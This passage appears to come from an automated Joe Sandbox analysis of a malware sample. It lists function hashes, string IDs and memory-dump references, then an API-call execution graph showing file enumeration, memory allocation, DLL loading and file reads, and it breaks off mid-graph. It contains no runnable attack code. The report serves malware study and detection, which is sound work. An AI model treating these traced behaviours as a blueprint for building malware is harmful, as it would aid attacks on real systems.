                                                                                                              • Opcode Fuzzy Hash: 5bd7519a139b4a50a57840ebba9e22ae570f8fa15fabef404c282f35a4f17931
                                                                                                              • Instruction Fuzzy Hash: EC31A7B5D51318BAEF50DFE4CC85BEEB7B9AF04700F50415CF618BA180DBB556488BA4
                                                                                                              Function 037B21D1 Relevance: 11.3, Strings: 9, Instructions: 43COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: /$1$4$:$I$`$f$o$w
                                                                                                              • API String ID: 0-1316387851
                                                                                                              • Opcode ID: 5fdf2e1f0c595c975885bb03b8af4b2d974eecc27c6b2146ce322064a0e1b817
                                                                                                              • Instruction ID: 35698e1af184327f4b3b025eeb98dc3b81948e97bc856d24656072ed741d54a9
                                                                                                              • Opcode Fuzzy Hash: 5fdf2e1f0c595c975885bb03b8af4b2d974eecc27c6b2146ce322064a0e1b817
                                                                                                              • Instruction Fuzzy Hash: E611DE20D092CEDDDB12C6AC84047EEBF715F12214F4882D9D4E56B2C3C27A4356D7A6
                                                                                                              Function 037C111D Relevance: 10.1, Strings: 8, Instructions: 133COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: .$P$e$i$m$o$r$x
                                                                                                              • API String ID: 0-620024284
                                                                                                              • Opcode ID: d576e4f64ceb7dc0a8dd4c651bb2eb6c1b46a7925b4662369aa255dcfd2430a0
                                                                                                              • Instruction ID: 5353a061a2266ae94025a599834fc060f3bf47a5489dbcc628239ae6e71a7080
                                                                                                              • Opcode Fuzzy Hash: d576e4f64ceb7dc0a8dd4c651bb2eb6c1b46a7925b4662369aa255dcfd2430a0
                                                                                                              • Instruction Fuzzy Hash: F641B7B9800318BAEB20EBA0CC44FDE777CAF54300F40859DE54DAB141EBB557589FA1
                                                                                                              Function 037CE271 Relevance: 8.9, Strings: 7, Instructions: 119COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: L$S$\$a$c$e$l
                                                                                                              • API String ID: 0-3322591375
                                                                                                              • Opcode ID: e995b83fcc5aa68ad0641f569ad60878e0e6fcea569a247ac4a8b2c60f0f6793
                                                                                                              • Instruction ID: f60a4a8ea9a0e4ca4ce68631fcda270d1468fe79bf7d930424648f36ef4f7aa0
                                                                                                              • Opcode Fuzzy Hash: e995b83fcc5aa68ad0641f569ad60878e0e6fcea569a247ac4a8b2c60f0f6793
                                                                                                              • Instruction Fuzzy Hash: 914153B6C10318AEDB10DFA4DC88BEEB7B8FF48311F49416ED909AB100E77166558B94
                                                                                                              Function 037C5DB2 Relevance: 7.7, Strings: 6, Instructions: 176COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: F$P$T$f$r$x
                                                                                                              • API String ID: 0-2523166886
                                                                                                              • Opcode ID: b025df41a15414d5f7e30c11d98cca6410156e77cc9190ce550bced86d5c401f
                                                                                                              • Instruction ID: 0e3aa229bef4107a23fe3e2bdd401bef4060ef2a4fa488fd36752c8983796b0a
                                                                                                              • Opcode Fuzzy Hash: b025df41a15414d5f7e30c11d98cca6410156e77cc9190ce550bced86d5c401f
                                                                                                              • Instruction Fuzzy Hash: F251F171910344EEEB39DFA5CC48BEAF7F8EF05310F04465EE4489A580E7B5A684CBA1
                                                                                                              Function 037C54CD Relevance: 6.5, Strings: 5, Instructions: 202COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $i$l$o$u
                                                                                                              • API String ID: 0-2051669658
                                                                                                              • Opcode ID: 2fd205580dcf7f8c8c7016bd0e118fbeaa212ccbfab26d771e887d06b5b5fb3d
                                                                                                              • Instruction ID: f12f1ed260575033e019bbb15c4e2eae92be659adc1662a9b35f1749fb76c685
                                                                                                              • Opcode Fuzzy Hash: 2fd205580dcf7f8c8c7016bd0e118fbeaa212ccbfab26d771e887d06b5b5fb3d
                                                                                                              • Instruction Fuzzy Hash: ED6169B6910344AFDB24DBA4CC84FEFB7FCAB89710F14455CE519AB240E775AA41CB60
                                                                                                              Function 037C54D1 Relevance: 6.4, Strings: 5, Instructions: 126COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $i$l$o$u
                                                                                                              • API String ID: 0-2051669658
                                                                                                              • Opcode ID: a4fc214f41808c867938166f824e9b4fed141587d69b7567285a4812ab6c9e99
                                                                                                              • Instruction ID: b722c94e1fbfc2c99bfe5947a4f33b2ae15dc592b1fb27684db5a0b696bd3bc6
                                                                                                              • Opcode Fuzzy Hash: a4fc214f41808c867938166f824e9b4fed141587d69b7567285a4812ab6c9e99
                                                                                                              • Instruction Fuzzy Hash: 26411BB1910348AFDB20DFA5CC84FEFBBF9AB89714F10455DE519AB240D771AA418B60
                                                                                                              Function 037C515F Relevance: 5.3, Strings: 4, Instructions: 301COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $e$k$o
                                                                                                              • API String ID: 0-3624523832
                                                                                                              • Opcode ID: 5e904b6ee15b4b9249ca26bec108c4a3531f3bd144c4916552ea1044c1622a08
                                                                                                              • Instruction ID: 41c23d138c0a34ab75c66ae8d7c29b67080b4c1e9be0316c91eb36388cd30e58
                                                                                                              • Opcode Fuzzy Hash: 5e904b6ee15b4b9249ca26bec108c4a3531f3bd144c4916552ea1044c1622a08
                                                                                                              • Instruction Fuzzy Hash: DFB119B5A00708AFDB24CBA9CC84FEFB7F9AF88710F14855CF619A7240D675AA41CB50
                                                                                                              Function 037C5A8B Relevance: 5.2, Strings: 4, Instructions: 239COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $e$h$o
                                                                                                              • API String ID: 0-3662636641
                                                                                                              • Opcode ID: b660e6b7d4b1ed6a2b0c7b580a94d450bbb92765de76104d58463560d32867e9
                                                                                                              • Instruction ID: c9ca2cd17c6f383b049b9042e0b0a7b1a081b970a5b434a8b4172c2f6d753a80
                                                                                                              • Opcode Fuzzy Hash: b660e6b7d4b1ed6a2b0c7b580a94d450bbb92765de76104d58463560d32867e9
                                                                                                              • Instruction Fuzzy Hash: 328165B6C10358AADB65DB54CC85FEEB37CEF48700F44429DE50D6A040EF756B848BA1
                                                                                                              Function 037C5161 Relevance: 5.2, Strings: 4, Instructions: 181COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $e$k$o
                                                                                                              • API String ID: 0-3624523832
                                                                                                              • Opcode ID: 2fd32304c3ef6cb7a82ad657eb4c7366dda142afcf77b0006ea1593ce260534a
                                                                                                              • Instruction ID: 17ec5e3dc15879eb68560eaf74428b99568a1d1a0ff00b3a74f1deab04a88ede
                                                                                                              • Opcode Fuzzy Hash: 2fd32304c3ef6cb7a82ad657eb4c7366dda142afcf77b0006ea1593ce260534a
                                                                                                              • Instruction Fuzzy Hash: BF6119B5A00348ABDB14DFA5CC84FEFB7BDAB88714F14855CA619AB240D771AA41CB60
                                                                                                              Function 037C5020 Relevance: 5.1, Strings: 4, Instructions: 122COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                                              • API String ID: 0-2877786613
                                                                                                              • Opcode ID: 45450a82271ba3d052c9166f3af1c262a13287d1a898f7e42005c6afadae15b4
                                                                                                              • Instruction ID: 04f0468d5911dd72b11a5ab4fc12956bb7d48504167402c030b0425423f2f625
                                                                                                              • Opcode Fuzzy Hash: 45450a82271ba3d052c9166f3af1c262a13287d1a898f7e42005c6afadae15b4
                                                                                                              • Instruction Fuzzy Hash: 46418FB59112487EEB11EB90CC45FFFB7BCAF85700F40404CFA40AA180EB74AB4587AA
                                                                                                              Function 037C5021 Relevance: 5.1, Strings: 4, Instructions: 120COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                                              • API String ID: 0-2877786613
                                                                                                              • Opcode ID: 66e524b661507ba3bef2097c13bf02c4973fc2c64d34aeeb307e71b68f136dcf
                                                                                                              • Instruction ID: b9a3847b3fb24d210fc8723a3f0cc627766f8d31e1a1cb38b1e438fdfaec25fe
                                                                                                              • Opcode Fuzzy Hash: 66e524b661507ba3bef2097c13bf02c4973fc2c64d34aeeb307e71b68f136dcf
                                                                                                              • Instruction Fuzzy Hash: 73315E759112587EEB11EB90CC46FEFB7BCAF95700F404049FA44AA180EB74AA4587EB
                                                                                                              Function 037C5A91 Relevance: 5.1, Strings: 4, Instructions: 102COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $e$h$o
                                                                                                              • API String ID: 0-3662636641
                                                                                                              • Opcode ID: 73ff9b5fccec621417d2c147cd1ac462ef81a97a1e5cfb657563ca13a14dae35
                                                                                                              • Instruction ID: 7c36d9324aa97e11c692154cf424c0175f27c82f8702d0f33f46b24411d4cfa7
                                                                                                              • Opcode Fuzzy Hash: 73ff9b5fccec621417d2c147cd1ac462ef81a97a1e5cfb657563ca13a14dae35
                                                                                                              • Instruction Fuzzy Hash: 6C4150B5C04358AADB50DBA4CC45FEEB7B8EF48700F4042D9A50CAA140EF746B849FA5
                                                                                                              Function 037C1301 Relevance: 5.1, Strings: 4, Instructions: 89COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 7$G$K$t
                                                                                                              • API String ID: 0-1935247632
                                                                                                              • Opcode ID: c96162170292c71e8470298acf7be25ebe17fe702fc4e108b2b52951027e04a7
                                                                                                              • Instruction ID: baa60b497063ac171bebc33ca925aa39208d930bc7f79f03daa7eb415c57cbe3
                                                                                                              • Opcode Fuzzy Hash: c96162170292c71e8470298acf7be25ebe17fe702fc4e108b2b52951027e04a7
                                                                                                              • Instruction Fuzzy Hash: A03164B5910208BBEB04DB94CC45FFEB7B8EF49304F444199ED08AB240EB75AA148BE5
                                                                                                              Function 037C271C Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $e$k$o
                                                                                                              • API String ID: 0-3624523832
                                                                                                              • Opcode ID: fe875d4f46ff4c6fbdd37e93ba187611f4f021ca6218b298dd0cd8ea7781120c
                                                                                                              • Instruction ID: a69d30a0f4d211f7e1c7e85c43e31c8833fd32090eac60303d7ae5591b667284
                                                                                                              • Opcode Fuzzy Hash: fe875d4f46ff4c6fbdd37e93ba187611f4f021ca6218b298dd0cd8ea7781120c
                                                                                                              • Instruction Fuzzy Hash: C311ACB2900208AFDB14DF98D8C4ADEBBB9FF48314F048259E919AB205E771A544CBA0
                                                                                                              Function 037C2721 Relevance: 5.0, Strings: 4, Instructions: 47COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $e$k$o
                                                                                                              • API String ID: 0-3624523832
                                                                                                              • Opcode ID: c8dcd472c93be491c28914bba79a1b6c957f5ddb905f78957cbad4fc6862d5c5
                                                                                                              • Instruction ID: a64be0ad33b6803ee7d702d1e247d52797ca4fab230bb062f48801d4ddce3f3c
                                                                                                              • Opcode Fuzzy Hash: c8dcd472c93be491c28914bba79a1b6c957f5ddb905f78957cbad4fc6862d5c5
                                                                                                              • Instruction Fuzzy Hash: B901C4B2900308ABDB14DF98D884BDEF7B9FF08314F44821DE9196B201E771A544CBA0
                                                                                                              Function 037AE688 Relevance: 5.0, Strings: 4, Instructions: 30COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ($NDI\$ORAX$Z
                                                                                                              • API String ID: 0-580376826
                                                                                                              • Opcode ID: cba09048254eeb7f0f368994795b7c683c278a2b283cc14a166a9dd249642e1c
                                                                                                              • Instruction ID: 00ba23540938318265873a96967d38c8826274e51c3f6410a2a432799c6bb765
                                                                                                              • Opcode Fuzzy Hash: cba09048254eeb7f0f368994795b7c683c278a2b283cc14a166a9dd249642e1c
                                                                                                              • Instruction Fuzzy Hash: 76F0E2B5900208AACB00DFE8C888BEEFF74EF81700FA545A8C8545B201D7709614CBA2

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:2.5%
                                                                                                              Dynamic/Decrypted Code Coverage:4.1%
                                                                                                              Signature Coverage:2.2%
                                                                                                              Total number of Nodes:458
                                                                                                              Total number of Limit Nodes:80
                                                                                                              execution_graph 99523 2ce2a8c 99524 2ce2ab8 99523->99524 99527 2ce6610 99524->99527 99526 2ce2ac3 99528 2ce6643 99527->99528 99529 2ce6667 99528->99529 99534 2cf93c0 99528->99534 99529->99526 99531 2ce668a 99531->99529 99538 2cf9870 99531->99538 99533 2ce670a 99533->99526 99535 2cf93dd 99534->99535 99541 3582ca0 LdrInitializeThunk 99535->99541 99536 2cf9409 99536->99531 99539 2cf988a 99538->99539 99540 2cf989b NtClose 99539->99540 99540->99533 99541->99536 99542 3582ad0 LdrInitializeThunk 99543 2ce5f83 99544 2ce5f8c 99543->99544 99545 2ce5f36 99543->99545 99547 2ce5f5c 99545->99547 99548 2ce83d0 99545->99548 99549 2ce8414 99548->99549 99550 2ce8435 99549->99550 99555 2cf8b70 99549->99555 99550->99545 99552 2ce8425 99553 2ce8441 99552->99553 99554 2cf9870 NtClose 99552->99554 99553->99545 99554->99550 99556 2cf8bf0 99555->99556 99557 2cf8b9e 99555->99557 99560 3584650 LdrInitializeThunk 99556->99560 99557->99552 99558 2cf8c15 99558->99552 99560->99558 99561 2ce7480 99562 2ce749c 99561->99562 99570 2ce74ef 99561->99570 99564 2cf9870 NtClose 99562->99564 99562->99570 99563 2ce7627 99565 2ce74b7 99564->99565 99571 2ce68a0 NtClose LdrInitializeThunk LdrInitializeThunk 99565->99571 99567 2ce7601 99567->99563 99573 2ce6a70 NtClose LdrInitializeThunk LdrInitializeThunk 99567->99573 99570->99563 99572 2ce68a0 NtClose LdrInitializeThunk LdrInitializeThunk 99570->99572 99571->99570 99572->99567 99573->99563 99574 2cec940 99576 2cec969 99574->99576 99575 2ceca6d 99576->99575 99577 2ceca13 FindFirstFileW 99576->99577 99577->99575 99579 2ceca2e 99577->99579 99578 2ceca54 FindNextFileW 99578->99579 99580 2ceca66 FindClose 99578->99580 99579->99578 99580->99575 99581 2ce9f40 99586 2cfba40 99581->99586 99583 2ce9f4e 99585 2ce9f76 99583->99585 99589 2cfb960 99583->99589 99592 2cf9b90 99586->99592 99588 2cfba5b 99588->99583 99595 2cf9be0 99589->99595 99591 2cfb979 99591->99585 99593 2cf9baa 99592->99593 99594 2cf9bbb RtlAllocateHeap 99593->99594 99594->99588 99596 2cf9bfd 99595->99596 99597 2cf9c0e RtlFreeHeap 99596->99597 99597->99591 99598 2ce5f00 99601 2ce5f30 99598->99601 99603 2ce8450 99598->99603 99600 2ce83d0 2 API calls 99600->99601 99601->99600 99602 2ce5f5c 99601->99602 99604 2ce8463 99603->99604 99607 2cf8da0 99604->99607 99606 2ce848e 99606->99601 99608 2cf8e21 99607->99608 99610 2cf8dce 99607->99610 99612 3582dd0 LdrInitializeThunk 99608->99612 99609 2cf8e46 99609->99606 99610->99606 99612->99609 99613 2cfb640 99614 2cfb64b 99613->99614 99615 2cfb66a 99614->99615 99617 2cf5e90 99614->99617 99618 2cf5ef2 99617->99618 99620 2cf5eff 99618->99620 99621 2ce2620 99618->99621 99620->99615 99623 2ce25e6 99621->99623 99624 2ce25f2 99623->99624 99626 2ce260b 99623->99626 99627 2cf8ea0 99623->99627 99631 2cf9900 99624->99631 99626->99620 99626->99626 99628 2cf8eba 99627->99628 99636 3582c0a 99628->99636 99629 2cf8ee6 99629->99624 99632 2cf998f 99631->99632 99633 2cf992b 99631->99633 99639 3582e80 LdrInitializeThunk 99632->99639 99633->99626 99634 2cf99c0 99634->99626 99637 3582c1f LdrInitializeThunk 99636->99637 99638 3582c11 99636->99638 99637->99629 99638->99629 99639->99634 99640 2ce715a 99641 2ce712c 99640->99641 99643 2ce715f 99640->99643 99645 2ce8280 99641->99645 99644 2ce7134 99646 2ce829d 99645->99646 99652 2cf8f90 99646->99652 99648 2ce82ed 99649 2ce82f4 99648->99649 99657 2cf9070 99648->99657 99649->99644 99651 2ce831d 99651->99644 99653 2cf902e 99652->99653 99654 2cf8fbe 99652->99654 99662 3582f30 LdrInitializeThunk 99653->99662 99654->99648 99655 2cf9067 99655->99648 99658 2cf9121 99657->99658 99660 2cf909f 99657->99660 99663 3582d10 LdrInitializeThunk 99658->99663 99659 2cf9166 99659->99651 99660->99651 99662->99655 99663->99659 99664 2cd9e50 99665 2cda0d2 99664->99665 99667 2cda5a3 99665->99667 99668 2cfb5a0 99665->99668 99669 2cfb5c4 99668->99669 99674 2cd4060 99669->99674 99671 2cfb5e3 99672 2cfb61c 99671->99672 99677 2cf59a0 99671->99677 99672->99667 99676 2cd406d 99674->99676 99681 2ce3540 99674->99681 99676->99671 99678 2cf5a01 99677->99678 99680 2cf5a0e 99678->99680 99717 2ce1ce0 99678->99717 99680->99672 99683 2ce355d 99681->99683 99682 2ce3576 99682->99676 99683->99682 99688 2cfa2b0 99683->99688 99685 2ce35d1 99685->99682 99695 2cf6100 99685->99695 99687 2ce3622 99687->99676 99690 2cfa2ca 99688->99690 99689 2cfa2f9 99689->99685 99690->99689 99691 2cf8ea0 LdrInitializeThunk 99690->99691 99692 2cfa359 99691->99692 99693 2cfb960 RtlFreeHeap 99692->99693 99694 2cfa372 99693->99694 99694->99685 99696 2cf6165 99695->99696 99697 2cf6190 99696->99697 99700 2ce31b0 99696->99700 99697->99687 99699 2cf6172 99699->99687 99701 2ce31be 99700->99701 99705 2ce319c 99701->99705 99706 2ce80d0 99701->99706 99704 2cf9870 NtClose 99704->99705 99705->99699 99707 2ce80ea 99706->99707 99711 2ce3443 99706->99711 99712 2cf8f40 99707->99712 99710 2cf9870 NtClose 99710->99711 99711->99704 99711->99705 99713 2cf8f5a 99712->99713 99716 35835c0 LdrInitializeThunk 99713->99716 99714 2ce81ba 99714->99710 99716->99714 99718 2ce1d1b 99717->99718 99733 2ce81e0 99718->99733 99720 2ce1d23 99721 2cfba40 RtlAllocateHeap 99720->99721 99732 2ce2006 99720->99732 99722 2ce1d39 99721->99722 99723 2cfba40 RtlAllocateHeap 99722->99723 99724 2ce1d4a 99723->99724 99725 2cfba40 RtlAllocateHeap 99724->99725 99726 2ce1d5b 99725->99726 99728 2ce1df2 99726->99728 99752 2ce6d70 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 99726->99752 99744 2ce4890 99728->99744 99730 2ce1fb2 99748 2cf82e0 99730->99748 99732->99680 99734 2ce820c 99733->99734 99735 2ce80d0 2 API calls 99734->99735 99736 2ce822f 99735->99736 99737 2ce8251 99736->99737 99738 2ce8239 99736->99738 99740 2ce826d 99737->99740 99742 2cf9870 NtClose 99737->99742 99739 2ce8244 99738->99739 99741 2cf9870 NtClose 99738->99741 99739->99720 99740->99720 99741->99739 99743 2ce8263 99742->99743 99743->99720 99745 2ce48b4 99744->99745 99746 2ce48bb 99745->99746 99747 2ce48f3 LdrLoadDll 99745->99747 99746->99730 99747->99746 99749 2cf8342 99748->99749 99751 2cf834f 99749->99751 99753 2ce2020 99749->99753 99751->99732 99752->99728 99755 2ce2040 99753->99755 99769 2ce84b0 99753->99769 99762 2ce25a3 99755->99762 99773 2cf14d0 99755->99773 99757 2ce209e 99757->99762 99776 2cfca00 99757->99776 99759 2ce2254 99781 2cfcb30 99759->99781 99761 2ce8450 LdrInitializeThunk 99765 2ce22b9 99761->99765 99762->99751 99763 2ce2269 99763->99765 99787 2ce0b20 99763->99787 99765->99761 99765->99762 99766 2ce0b20 LdrInitializeThunk 99765->99766 99766->99765 99767 2ce2413 99767->99765 99768 2ce8450 LdrInitializeThunk 99767->99768 99768->99767 99770 2ce84bd 99769->99770 99771 2ce84de SetErrorMode 99770->99771 99772 2ce84e5 99770->99772 99771->99772 99772->99755 99791 2cfb8d0 99773->99791 99775 2cf14f1 99775->99757 99777 2cfca16 99776->99777 99778 2cfca10 99776->99778 99779 2cfba40 RtlAllocateHeap 99777->99779 99778->99759 99780 2cfca3c 99779->99780 99780->99759 99782 2cfcaa0 99781->99782 99783 2cfba40 RtlAllocateHeap 99782->99783 99784 2cfcafd 99782->99784 99785 2cfcada 99783->99785 99784->99763 99786 2cfb960 RtlFreeHeap 99785->99786 99786->99784 99788 2ce0b3d 99787->99788 99798 2cf9af0 99788->99798 99794 2cf99d0 99791->99794 99793 2cfb901 99793->99775 99795 2cf9a65 99794->99795 99797 2cf99fb 99794->99797 99796 2cf9a7b NtAllocateVirtualMemory 99795->99796 99796->99793 99797->99793 99799 2cf9b0d 99798->99799 99802 3582c70 LdrInitializeThunk 99799->99802 99800 2ce0b42 99800->99767 99802->99800 99803 2ceb090 99808 2ceada0 99803->99808 99805 2ceb09d 99822 2ceaa20 99805->99822 99807 2ceb0b9 99809 2ceadc5 99808->99809 99833 2ce86c0 99809->99833 99812 2ceaf13 99812->99805 99814 2ceaf2a 99814->99805 99815 2ceaf21 99815->99814 99817 2ceb017 99815->99817 99852 2cea470 99815->99852 99819 2ceb07a 99817->99819 99861 2cea7e0 99817->99861 99820 2cfb960 RtlFreeHeap 99819->99820 99821 2ceb081 99820->99821 99821->99805 99823 2ceaa36 99822->99823 99826 2ceaa41 99822->99826 99824 2cfba40 RtlAllocateHeap 99823->99824 99824->99826 99825 2ceaa62 99825->99807 99826->99825 99827 2ce86c0 GetFileAttributesW 99826->99827 99828 2cead72 99826->99828 99831 2cea470 RtlFreeHeap 99826->99831 99832 2cea7e0 RtlFreeHeap 99826->99832 99827->99826 99829 2cead8b 99828->99829 99830 2cfb960 RtlFreeHeap 99828->99830 99829->99807 99830->99829 99831->99826 99832->99826 99834 2ce86e1 99833->99834 99835 2ce86f3 99834->99835 99836 2ce86e8 GetFileAttributesW 99834->99836 99835->99812 99837 2cf36f0 99835->99837 99836->99835 99838 2cf36fe 99837->99838 99839 2cf3705 99837->99839 99838->99815 99840 2ce4890 LdrLoadDll 99839->99840 99841 2cf373a 99840->99841 99842 2cf3749 99841->99842 99865 2cf31b0 LdrLoadDll 99841->99865 99844 2cfba40 RtlAllocateHeap 99842->99844 99848 2cf38f4 99842->99848 99845 2cf3762 99844->99845 99846 2cf38ea 99845->99846 99845->99848 99850 2cf377e 99845->99850 99847 2cfb960 RtlFreeHeap 99846->99847 99846->99848 99847->99848 99848->99815 99849 2cfb960 RtlFreeHeap 99851 2cf38de 99849->99851 99850->99848 99850->99849 99851->99815 99853 2cea496 99852->99853 99866 2cedeb0 99853->99866 99855 2cea508 99857 2cea690 99855->99857 99859 2cea526 99855->99859 99856 2cea675 99856->99815 99857->99856 99858 2cea330 RtlFreeHeap 99857->99858 99858->99857 99859->99856 99871 2cea330 99859->99871 99862 2cea806 99861->99862 99863 2cedeb0 RtlFreeHeap 99862->99863 99864 2cea88d 99863->99864 99864->99817 99865->99842 99867 2cedecf 99866->99867 99868 2cedee1 99867->99868 99869 2cfb960 RtlFreeHeap 99867->99869 99868->99855 99870 2cedf24 99869->99870 99870->99855 99872 2cea34d 99871->99872 99875 2cedf40 99872->99875 99874 2cea453 99874->99859 99876 2cedf64 99875->99876 99877 2cee00e 99876->99877 99878 2cfb960 RtlFreeHeap 99876->99878 99877->99874 99878->99877 99879 2cf96d0 99880 2cf977a 99879->99880 99882 2cf96fe 99879->99882 99881 2cf9790 NtReadFile 99880->99881 99883 2cf8cd0 99884 2cf8d5f 99883->99884 99886 2cf8cfb 99883->99886 99888 3582ee0 LdrInitializeThunk 99884->99888 99885 